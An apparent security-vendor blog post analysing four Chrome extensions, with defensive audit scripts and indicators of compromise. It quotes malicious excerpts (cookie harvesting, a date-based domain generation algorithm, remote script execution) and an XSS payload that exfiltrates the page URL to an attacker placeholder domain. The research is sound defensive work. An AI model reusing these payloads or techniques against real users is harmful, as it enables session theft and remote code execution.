Chrome Extensions: Are you getting more than you bargained for?
Browser extensions can be really useful, but hidden dangers may lurk beyond their marketing.
The Google Chrome Web Store is a treasure trove of useful browser extensions to help make our lives easier or more fun when navigating the web.
When browsing the store, many extensions look tempting but hide functionality that is not apparent to users. It is usually nice to get more than you expected, but in some cases the extras are not what you bargained for.
Our security research has uncovered several malicious Chrome extensions that compromise user security. These extensions, with a combined user base exceeding 100,000, employ tactics ranging from granting clipboard access to untrusted external domains to using command-and-control (C&C) infrastructure backed by a domain generation algorithm.
In this blog, we take a closer look at a few extensions that exhibit the typical malicious or deceptive behaviors found in some Chrome extensions, to highlight the risks involved in installing them. Even though the Chrome Web Store applies several checks to filter out potentially malicious extensions, some inevitably make it through the vetting process, putting unsuspecting users at risk.
Example 1: Good Tab - exposes clipboard to remote third party

Name: Good Tab
Extension ID: glckmpfajbjppappjlnhhlofhdhlcgaj
Risks: Undisclosed clipboard delegation to remote HTTP content
Good Tab presents itself as a customizable new tab page with weather, news, and wallpaper features. Its Chrome Web Store description makes no mention of clipboard access or external domains.
However, under the hood, the extension's new tab page embeds an iframe whose allow attribute delegates the clipboard-read and clipboard-write permissions to an external domain, so whatever that domain serves into the frame can read and write the user's clipboard.
<!-- index.html -->
<iframe allow="clipboard-read; clipboard-write"
        src="http://api.office123456[.]com/vcx/">
</iframe>
To make matters worse, the framed content is loaded over plain HTTP, so anyone on the network path (an adversary-in-the-middle, AiTM) can read or replace what the frame loads and thereby inherit the clipboard access the frame has been granted. The extension fetches a payload from the suspicious domain, which in turn references a separate, heavily obfuscated JavaScript file that loads Baidu analytics (hm.baidu[.]com) and additional third-party tracking scripts.
The security implication is that whoever controls that domain, or the path to it, can see everything the user copies to the clipboard and can write to it without the user's knowledge. This is dangerous whenever users copy and paste sensitive data such as passwords, API keys, or authentication or transaction tokens, and it enables the clipboard-swapping tactic that attackers have long used to redirect cryptocurrency transactions by replacing the destination wallet address at paste time.
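As an added example (not code from the Good Tab extension), the following script performs the check a reviewer would want to run over an extension page: it lists what every iframe delegates through its allow attribute and to which origin, and flags clipboard delegation to a foreign origin and plain-HTTP frame sources. The sample page is constructed around the iframe quoted above; the second, same-origin iframe and its weather widget path are assumptions added for contrast.

```javascript
// Added example, not code from Good Tab: a static check that lists what each
// iframe in an extension page delegates, and to which origin.  Input is the
// page's HTML and the extension's own origin (chrome-extension://<id>).
// It flags clipboard delegation to a foreign origin and plain-http sources.

const CLIPBOARD_FEATURES = new Set(["clipboard-read", "clipboard-write"]);

// IoCs are usually written defanged ("[.]"); restore the dot before parsing.
function refang(s) {
  return s.replace(/\[\.\]/g, ".");
}

// Minimal attribute parser, sufficient for <iframe ...> tags.
function parseAttributes(tag) {
  const attrs = {};
  const re = /([a-zA-Z-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/g;
  let m;
  while ((m = re.exec(tag)) !== null) {
    attrs[m[1].toLowerCase()] = m[2] ?? m[3] ?? m[4] ?? "";
  }
  return attrs;
}

function auditIframes(html, extensionOrigin) {
  const ext = new URL(extensionOrigin + "/");
  const results = [];
  for (const tag of html.match(/<iframe\b[^>]*>/gi) || []) {
    const attrs = parseAttributes(tag);
    // A relative src resolves against the extension itself.
    const url = new URL(refang(attrs.src || ""), ext);
    // Permissions Policy syntax: "feature [allowlist]; feature [allowlist]".
    const delegated = (attrs.allow || "")
      .split(";")
      .map((f) => f.trim().split(/\s+/)[0])
      .filter(Boolean);
    // chrome-extension: is not a "special" scheme, so url.origin would read
    // "null"; compare scheme and host instead.
    const crossOrigin = url.protocol !== ext.protocol || url.host !== ext.host;
    const issues = [];
    if (crossOrigin && delegated.some((f) => CLIPBOARD_FEATURES.has(f))) {
      issues.push(`clipboard delegated to third-party origin ${url.protocol}//${url.host}`);
    }
    if (url.protocol === "http:") {
      issues.push("frame content loaded over plain HTTP; an AiTM can replace it");
    }
    results.push({ src: url.href, crossOrigin, delegated, issues });
  }
  return results;
}

// Constructed sample page: the first iframe is the one quoted above, the
// second is an assumed, benign same-origin widget for contrast.
const SAMPLE_NEWTAB_HTML = `
<html><body>
<iframe allow="clipboard-read; clipboard-write"
  src="http://api.office123456[.]com/vcx/">
</iframe>
<iframe src="widgets/weather.html" allow="geolocation"></iframe>
</body></html>`;

const GOOD_TAB_ORIGIN = "chrome-extension://glckmpfajbjppappjlnhhlofhdhlcgaj";

function auditGoodTabSample() {
  return auditIframes(SAMPLE_NEWTAB_HTML, GOOD_TAB_ORIGIN);
}

console.log(JSON.stringify(auditGoodTabSample(), null, 2));
```

The point of the origin comparison is that delegation via allow is only a problem when the frame is cross-origin: a same-origin frame already shares the page's permissions, while a third-party frame gains clipboard access it would not otherwise have.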
Example 2: Children Protection - data exfiltration and remote code execution with C&C framework

Name: Children Protection
Extension ID: giecgobdmgdamgffeoankaipjkdjbfep
Risks: Remote code execution, C&C infrastructure, cookie/data exfiltration
This extension is marketed as a parental control tool to "protect your children from many malicious websites," which it does by blocking and tracking access to inappropriate sites and content. However, unknown to users, the extension also implements a full C&C framework with capabilities that go far beyond anything a legitimate parental control application requires.
We found ample evidence of highly suspect practices, such as anti-analysis techniques like splitting strings into chunks as a rudimentary form of code obfuscation, which raises the question of what the developers are trying to hide.
Worse, the extension can harvest cookies from the browser. The cookies are collected into a batch and later exfiltrated to a remote site. Cookie exfiltration is highly suspicious behavior and is commonly used by attackers to enable session hijacking, since a stolen session cookie lets the attacker impersonate the logged-in user.
// Command handler: on a "cookies" command, wrap every cookie of the current
// page in a synthetic <cookie> element so the batch can be sent out later
if (v.selector == cmds.cookies) {
    var cks = document.createElement('cookies');
    document.cookie.split('; ').forEach(function(v, i) {
        var cki = document.createElement('cookie');
        cki.innerText = v;
        cks.appendChild(cki);
    });
    else = [cks]; // assignment target was lost in the captured excerpt
}
The extension also uses a domain generation algorithm (DGA) to derive fallback C&C domains, used when the primary C&C configuration at codon[.]vn/ext/xmshield.json cannot be reached. DGAs are a staple of malware C&C design because they make the infrastructure resilient to takedown: there is no single fixed domain to block.
var date = new Date();
var id = (new Date(date.getFullYear(), date.getMonth(), date.getDate()))
.getTime().toString(36);
urlCfg = 'http://' + `${id}.live/` + id + '.json';
The DGA takes the millisecond timestamp of the current day's local midnight, encodes it in base 36, and uses the result as both the hostname under .live and the file name, producing URLs such as http://k8n1z40[.]live/k8n1z40.json, with a new domain every day. Because the only input is the date, anyone who knows the scheme can compute the domains in advance.
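As an added example (not the extension's own code), the following reproduces the fallback scheme so that a defender can precompute the domains for a blocklist, and decodes a suspect hostname back to the day it encodes. The extension uses the local midnight of the victim's machine; this example uses UTC midnight so that the output is deterministic, which means a victim in another timezone produces a different id for the same calendar day. The .live suffix and the URL shape are taken from the quoted code; the 2015-2040 plausibility window and the quarter-hour check are assumptions.

```javascript
// Added example, not the extension's code: reproduces the fallback-domain
// scheme quoted above so the domains can be precomputed and blocked.  The
// extension encodes the millisecond timestamp of the day's local midnight in
// base 36; this example uses UTC midnight so the result is deterministic, so
// a victim in another timezone gets a different id for the same calendar day.

const DAY_MS = 24 * 60 * 60 * 1000;

// Base-36 id for the UTC midnight of the given calendar day (monthIndex is 0-based).
function dgaIdForUtcDate(year, monthIndex, day) {
  return Date.UTC(year, monthIndex, day).toString(36);
}

// Fallback config URL in the shape used by the extension: http://<id>.live/<id>.json
function fallbackUrlForId(id) {
  return `http://${id}.live/${id}.json`;
}

// Domains for the UTC day of `from` and the following days, for a blocklist
// or DNS watchlist.
function upcomingFallbackDomains(from, days) {
  const start = Date.UTC(from.getUTCFullYear(), from.getUTCMonth(), from.getUTCDate());
  const out = [];
  for (let i = 0; i < days; i++) {
    const id = (start + i * DAY_MS).toString(36);
    out.push({ id, domain: `${id}.live`, url: fallbackUrlForId(id) });
  }
  return out;
}

// Inverse, for triage of DNS logs: decode a "<id>.live" hostname back to the
// day it was generated for, or null when it does not look like this DGA.
// Local-midnight timestamps land on a quarter-hour boundary in UTC (every
// timezone offset is a multiple of 15 minutes), so that is the check used
// rather than an exact UTC midnight.  The date window is an assumption.
function dateFromFallbackHost(host) {
  const m = /^([0-9a-z]+)\.live$/.exec(host);
  if (!m) return null;
  const ts = parseInt(m[1], 36);
  const quarterHour = 15 * 60 * 1000;
  if (!Number.isFinite(ts) || ts % quarterHour !== 0) return null;
  if (ts < Date.UTC(2015, 0, 1) || ts >= Date.UTC(2040, 0, 1)) return null;
  return new Date(ts);
}

// Print the next week of fallback URLs (UTC days).
for (const d of upcomingFallbackDomains(new Date(), 7)) console.log(d.url);
```

For blocking, generate the list for every timezone offset you need to cover rather than only UTC, since each offset yields its own id for the same day.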
The extension also includes ad injection functionality to enable it to download and display ads, as a revenue generation stream.
// Listens for a message from the injected content and asks the background
// script to open a tab for the ad; `data` presumably refers to event.data,
// its assignment is not part of the excerpt
window.addEventListener("message", function(event) {
    if (event.data.method == "FR_X2_P") {
        chrome.runtime.sendMessage({ method: cmds.create_tab,
            data: { url: data.url, url_ad: data.url_ad, w: data.w, h: data.h } });
    }
});
Perhaps the most egregious functionality is the C&C framework that can be used to execute remote code.
// Background handler for C&C commands: run an inline `code` string in the
// target tab, or fetch a script from the `file` URL and run that
if (typeof request.code !== 'undefined' && request.code.length > 0) {
    chrome.tabs.executeScript(request.tabId, { code: request.code });
}
if (typeof request.file !== 'undefined' && request.file.length > 0) {
    loadContentXHR(request.file, function(contentJS) {
        chrome.tabs.executeScript(request.tabId, { code: contentJS });
    });
}
Through this functionality, the C&C server can push arbitrary JavaScript, either inline (code) or fetched from a URL (file), for execution in any tab. This relies on the Manifest V2 chrome.tabs.executeScript API, which accepts a code string; its Manifest V3 replacement, chrome.scripting.executeScript, only runs packaged files or functions, which is one of the reasons Google deprecated the older API.
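As an added example (not the extension's code), the following static scan looks for the sinks and tricks described in this section: string-chunking obfuscation, access to document.cookie, eval or new Function, and chrome.tabs.executeScript called with a code string. It is meant to run over the JavaScript files of an unpacked extension and reports the line of each hit. The sample source is constructed to resemble the excerpts above; the rule set and its thresholds are assumptions.

```javascript
// Added example, not from the Children Protection extension: a small static
// scan for the sinks and tricks discussed above, meant to run over the JS
// files of an unpacked extension.  Each hit is reported with its line number.

const RULES = [
  {
    id: "remote-code-exec",
    // tabs.executeScript with a `code:` string runs whatever the caller supplies
    re: /chrome\.tabs\.executeScript\([^)]*\bcode\s*:/g,
  },
  { id: "dynamic-eval", re: /\beval\s*\(|\bnew\s+Function\s*\(/g },
  { id: "cookie-access", re: /\bdocument\.cookie\b/g },
  {
    id: "chunked-string",
    // four or more short single-quoted pieces joined with "+", or
    // ['co','ok','ie'].join('') style assembly (three or more pieces)
    re: /(?:'[^'\n]{1,4}'\s*\+\s*){3,}'[^'\n]{1,4}'|\[\s*(?:'[^'\n]{1,4}'\s*,\s*){2,}'[^'\n]{1,4}'\s*\]\s*\.join\(/g,
  },
];

// 1-based line number of a character offset in `text`.
function lineOf(text, index) {
  let line = 1;
  for (let i = 0; i < index; i++) if (text.charCodeAt(i) === 10) line++;
  return line;
}

// Scans the whole file at once so that multi-line calls still match.
function scanExtensionSource(source) {
  const findings = [];
  for (const rule of RULES) {
    for (const m of source.matchAll(rule.re)) {
      findings.push({
        rule: rule.id,
        line: lineOf(source, m.index),
        snippet: m[0].split("\n")[0].trim(),
      });
    }
  }
  return findings.sort((a, b) => a.line - b.line);
}

// Constructed sample shaped like the excerpts quoted on this page.
const SAMPLE_SOURCE = [
  "var k = 'co' + 'ok' + 'ie' + 's';",
  "function onCmd(request) {",
  "  if (request.code) {",
  "    chrome.tabs.executeScript(request.tabId, { code: request.code });",
  "  }",
  "  var all = document.cookie.split('; ');",
  "  return eval('(' + request.cfg + ')');",
  "}",
].join("\n");

function scanSample() {
  return scanExtensionSource(SAMPLE_SOURCE);
}

for (const f of scanSample()) console.log(`${f.line}: ${f.rule}  ${f.snippet}`);
```

None of these patterns is proof of malice on its own (a parental-control extension may legitimately need cookies or tabs), but chunked strings next to an executeScript sink and an eval are exactly the combination a reviewer should not let through without reading the surrounding code.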
Example 3: DPS Websafe - search hijacking

Name: DPS Websafe
Extension ID: bjoddpbfndnpeohkmpbjfhcppkhgobcg
Risks: Search hijacking, user tracking, and brand impersonation
This extension claims to provide "genuine search results without ads" but actually performs search hijacking and user tracking behind the scenes. It also borrows the branding of Adblock Plus, a legitimate ad-blocking extension, to gain users' trust.
The extension reuses the Adblock Plus icon, and the developers even acknowledge the lineage in a code comment:
/* DPS Websafe is a bifurcation of the Adblock Plus extension
* for blocking advertisements on the web.
*/
The real damage is done by the manifest's chrome_settings_overrides entry, which replaces the user's default search engine with one controlled by the developer. Every query, and every keystroke sent for suggestions, then goes to the developer's server, which can log the terms, redirect the user, inject content into the results, or simply earn referral revenue.
"chrome_settings_overrides": {
    "search_provider": {
        "is_default": true,
        "search_url": "http://www.dpswebsafe[.]com/rd/?q={searchTerms}",
        "suggest_url": "http://www.dpswebsafe[.]com/rd/?q={searchTerms}&type=list"
    }
}
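As an added example (not DPS Websafe's manifest or code), the following review helper reads an extension's manifest.json and reports what chrome_settings_overrides redirects, whether the new URLs use plain HTTP, whether their host matches the developer's declared homepage_url, and which privileged permissions are requested. The sample manifest is constructed: the override block is the one quoted above; the name, homepage_url and permission list are placeholders.

```javascript
// Added example, not DPS Websafe's manifest or code: a review helper for
// manifest.json that surfaces settings overrides and privileged permissions.

const PRIVILEGED_PERMISSIONS = new Set([
  "cookies", "tabs", "webRequest", "webRequestBlocking", "webNavigation",
  "scripting", "clipboardRead", "clipboardWrite", "history", "management",
  "<all_urls>",
]);

// IoCs are usually written defanged ("[.]"); restore the dot before parsing.
function refang(s) {
  return s.replace(/\[\.\]/g, ".");
}

function reviewManifest(manifestText) {
  const m = JSON.parse(manifestText);
  const report = { overrides: [], privileged: [], hostPermissions: [] };
  const homepageHost = m.homepage_url ? new URL(refang(m.homepage_url)).host : null;

  // Collect every URL the manifest forces into browser settings.
  const ov = m.chrome_settings_overrides || {};
  const sp = ov.search_provider || null;
  const urls = [];
  if (sp) {
    for (const key of ["search_url", "suggest_url"]) {
      if (sp[key]) urls.push([`search_provider.${key}`, sp[key]]);
    }
  }
  if (ov.homepage) urls.push(["homepage", ov.homepage]);
  for (const u of ov.startup_pages || []) urls.push(["startup_pages", u]);

  for (const [setting, raw] of urls) {
    const url = new URL(refang(raw));
    const notes = [];
    if (url.protocol === "http:") notes.push("plain HTTP");
    if (homepageHost && url.host !== homepageHost) {
      notes.push(`host differs from homepage_url (${homepageHost})`);
    }
    if (setting.startsWith("search_provider") && sp.is_default) {
      notes.push("becomes the default search engine");
    }
    report.overrides.push({ setting, host: url.host, notes });
  }

  // MV2 lists host patterns under permissions; MV3 under host_permissions.
  for (const p of [...(m.permissions || []), ...(m.host_permissions || [])]) {
    if (PRIVILEGED_PERMISSIONS.has(p)) report.privileged.push(p);
    else if (/^(\*|https?|file|ftp):\/\//.test(p)) report.hostPermissions.push(p);
  }
  return report;
}

// Constructed manifest: only the chrome_settings_overrides block comes from
// the page; name, homepage_url and permissions are placeholders.
const SAMPLE_MANIFEST = JSON.stringify({
  manifest_version: 2,
  name: "constructed sample",
  version: "1.0",
  homepage_url: "https://example-developer.test/",
  permissions: ["tabs", "storage", "http://*/*", "https://*/*"],
  chrome_settings_overrides: {
    search_provider: {
      is_default: true,
      search_url: "http://www.dpswebsafe[.]com/rd/?q={searchTerms}",
      suggest_url: "http://www.dpswebsafe[.]com/rd/?q={searchTerms}&type=list",
    },
  },
});

function reviewSample() {
  return reviewManifest(SAMPLE_MANIFEST);
}

console.log(JSON.stringify(reviewSample(), null, 2));
```

A search provider whose host has nothing to do with the developer's declared site, served over plain HTTP and set as the default, is the signature of a search hijacker regardless of what the store listing says.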
It also carries out user tracking by sending tracking information to a remote site without a user’s knowledge.
var extupdateurl = "http://trk.entiretrack[.]com/trackerwcfsrv/tracker.svc/trackUpdate/?q=";
extupdateurl = extupdateurl + encodeURIComponent("pxl=XTD5316_XTD5199_RUNT...");
$.get(extupdateurl, function (data) {
console.log("update tracking fired..", extupdateurl);
});
Example 4: Stock Informer - XSS vulnerability

Name: Stock Informer
Extension ID: beifiidafjobphnbhbbgmgnndjolfcho
Risks: Exploitable XSS vulnerability, and search hijacking
Our final example, Stock Informer, is described as a stock market information extension for "Markets & Currencies Information, links", but it contains two distinct security risks.
The more severe is a cross-site scripting (XSS) vulnerability, tracked as CVE-2020-28707 (CVSS score: 6.1), in the bundled Stockdio Historical Chart plugin prior to version 2.8.1, which allows a remote attacker to execute JavaScript in the browser. The flaw arises because the plugin's message listener passes the content of incoming postMessage events straight to eval() without checking the sender's origin or validating the data:
if (typeof(stockdio_events) == "undefined") {
    stockdio_events = true;
    // legacy IE fallback (attachEvent) versus standard addEventListener
    var stockdio_eventMethod = window.addEventListener ? "addEventListener" : "attachEvent";
    var stockdio_eventer = window[stockdio_eventMethod];
    var stockdio_messageEvent = stockdio_eventMethod == "attachEvent" ? "onmessage" : "message";
    stockdio_eventer(stockdio_messageEvent, function (e) {
        if (typeof(e.data) != "undefined" && typeof(e.data.method) != "undefined") {
            eval(e.data.method); // CRITICAL: No origin check!
        }
    }, false);
}
An attacker can exploit this by planting an exploit on a website the victim visits. The crafted message has to reach the window running the listener, for example via window.parent from content that the vulnerable page frames, and from there the following payload leaks that window's current URL to the attacker via a URL parameter:
// Posted to the window running the vulnerable listener - leak its URL to the attacker:
window.postMessage({
    method: "fetch('https://[ATTACKER DOMAIN]/leak?url='+encodeURIComponent(location.href))"
}, "*");
What can be achieved beyond that depends on the permissions the extension holds; because the listener runs inside the extension's own new tab page, injected code may also be able to reach Chrome extension APIs such as chrome.storage. At minimum, the flaw gives arbitrary script execution in the new tab context, which can be used for tracking, redirects, or data theft from pages the user loads into that tab.
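As an added example (neither Stockdio's nor the extension's code), the vulnerable listener quoted above is reduced to a plain function that takes a MessageEvent-like object ({origin, data}) and is placed next to a hardened version, so both can be exercised in Node with constructed events. The pageLocation stand-in, the trusted-origin list, and the resize method table are assumptions made for the demonstration.

```javascript
// Added example, not Stockdio's or the extension's code: the vulnerable
// postMessage handler from the page, reduced to a function, beside a hardened
// version.  Events are constructed objects; no browser is needed.

const pageLocation = { href: "https://victim.example/newtab" }; // stands in for window.location

const leaked = []; // what an attacker-controlled payload managed to exfiltrate
function recordLeak(value) { leaked.push(value); }
function leakedValues() { return leaked.slice(); }

// Vulnerable (same logic as the page's snippet): evaluates data.method as
// code from any origin.  Direct eval runs in this scope, so the payload can
// reach pageLocation, recordLeak, and anything else the page exposes.
function vulnerableOnMessage(e) {
  if (typeof e.data != "undefined" && typeof e.data.method != "undefined") {
    eval(e.data.method); // no origin check, no restriction on what runs
    return "executed";
  }
  return "ignored";
}

// Hardened: an explicit origin allow-list, a fixed table of named methods
// with validated structured arguments, and no eval anywhere.
const TRUSTED_ORIGINS = new Set(["https://charts.trusted.example"]); // assumed
const chartState = { width: 0, height: 0 };
const METHODS = {
  resize(args) {
    const w = Number(args.width), h = Number(args.height);
    if (!Number.isInteger(w) || !Number.isInteger(h) || w <= 0 || h <= 0) return "rejected-args";
    chartState.width = w;
    chartState.height = h;
    return "ok";
  },
};

function hardenedOnMessage(e) {
  if (!TRUSTED_ORIGINS.has(e.origin)) return "rejected-origin";
  if (!e.data || typeof e.data !== "object") return "rejected-shape";
  // hasOwnProperty keeps "constructor", "__proto__" etc. from resolving
  if (!Object.prototype.hasOwnProperty.call(METHODS, e.data.method)) return "rejected-method";
  return METHODS[e.data.method](e.data.args || {});
}

console.log(hardenedOnMessage({
  origin: "https://evil.example",
  data: { method: "recordLeak(pageLocation.href)" },
})); // rejected-origin
```

The fix is not just the origin check: even a trusted origin should only be able to name a method, never supply code, because the trusted side can itself be compromised or spoofed behind an AiTM when it is served over HTTP.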
We do not believe this outcome was intended by the developers; it most likely results from bundling an outdated, vulnerable component, which once again highlights the pitfalls of the software supply chain.
While the XSS flaw may be accidental, the search hijacking is not. The extension's new tab page includes a search form that redirects queries to a monetization service (searchingpart[.]com, see the indicators below), earning revenue for the developer identified by the affiliate ID embedded in the form's fields.
Conclusions
While browser extensions can provide a wide range of handy tools to help us achieve more online, much care needs to be taken when choosing to install them, even when installing from trusted sources.
Our brief look at extensions available on the Chrome Web Store shows that unwanted or undocumented functionality that puts users at risk is an ever-present danger.
These dangers span a broad spectrum, from relatively low-risk behavior such as undisclosed monetization through ad display, to leaking browsing activity, hijacking searches or sessions, and even remote code execution.
We have reported these extensions to Google and recommend their immediate removal from the Chrome Web Store. If any of them are installed, uninstall them immediately and use a trusted security solution such as Symantec Endpoint Security to check for signs of compromise and take further action as necessary.
Users are advised to practice caution when choosing which extensions to install. Always install from a reputable source, check the developer’s profile and website to see if the extension comes from a trustworthy organization, and check the reviews and ratings to look for warning signs.
A browser protection solution such as Symantec Browser Protection can also help block malicious activity associated with web-borne threats, including those caused by malicious extensions.
Indicators of Compromise
| Extension name | Extension ID |
|---|---|
| Good Tab | glckmpfajbjppappjlnhhlofhdhlcgaj |
| Children Protection | giecgobdmgdamgffeoankaipjkdjbfep |
| DPS Websafe | bjoddpbfndnpeohkmpbjfhcppkhgobcg |
| Stock Informer | beifiidafjobphnbhbbgmgnndjolfcho |

| URL/Domain | Associated Extension | Purpose |
|---|---|---|
| http://api.office123456[.]com/vcx/ | Good Tab | Clipboard access endpoint |
| https://codon[.]vn/ext/xmshield.json | Children Protection | Primary C&C server |
| http://*.live/*.json (DGA pattern) | Children Protection | Fallback C&C domains |
| http://www.dpswebsafe[.]com/rd/ | DPS Websafe | Search hijacking |
| http://trk.entiretrack[.]com/ | DPS Websafe | User tracking |
| http://searchingpart[.]com | Stock Informer | Search monetization |